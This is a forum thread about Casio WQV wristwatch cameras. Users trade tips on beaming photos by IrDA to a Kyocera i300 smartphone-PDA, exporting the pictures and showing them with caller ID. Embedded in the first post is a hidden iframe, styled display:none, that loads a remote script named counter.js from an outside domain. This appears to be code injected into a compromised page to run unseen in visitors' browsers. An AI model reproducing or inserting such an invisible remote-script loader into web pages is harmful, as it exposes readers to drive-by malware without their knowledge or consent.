I tried the palm software for the Casio color wristwatch camera and it works fine. Take up to 80 pics, download it to i300 via IrDA and then display. I have not tried all 80 pics yet.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
There are 3 models+ out there.
WQV2-has BK&W screen and does BK&W
WQV3 has BK&W screen and does color
Model 10 has color screen and does color
I have the WQ3 so I can only speak for it.
The software is with the camera but can be downloaded from Casios website.
Check out the websites on the net you will get pic quality idea.
Its really cool to take a pic and then display it on the i300!!!
You got a phone/PDA and a camera watch -what else do you need????
My mother-in-law happened to have the WQV1 so I've been playing with it & my I300. Pictures beam fine from the watch. Now, I'd like to be able to email them to someone. I don't want to use multimail. There are several programs out there to email pictures from eyemodule or palmpix databases (bugme messenger, camera mail, eyemail), but the casio WQV files are saved in some other format. It can export to Fireviewer format, but that still doesn't help me.
Other than using bugme's screenshot option to grab the WQVlink screen with the picture, can anyone suggest a way to get pictures into one of the above programs? A possibility is that Bugme messenger comes with a pictures.pdb sample database that lets you insert pictures. If I could get the casio WQV files into that format, I'd be set.
Any ideas?
The icon on the i300 should say WQV color. Touch it and hit receive to put it in the proper mode.
The watch should be in the IR menu and upper left icon selected
with main button on watch.
If this does not work try the software on a laptop or another device that has IrDA.
I can only verify that my unit works. I am using the WQV-3 color camera with B&K display. The OS on the palm is the latest available but worked ok on the OS version when I bought it.
Thanks. I got it to work. The icons on the watch are misleading. There is an image of a pda but you do not choose that icon instead you choose the computer icon. Works great. FYI downloaded the drivers from http://world.casio.com for the WQV10 Color watch for pda sync.
Next question now that I have gotten the photos from my casio onto my i300 how do I get the photos to come up with caller ID?
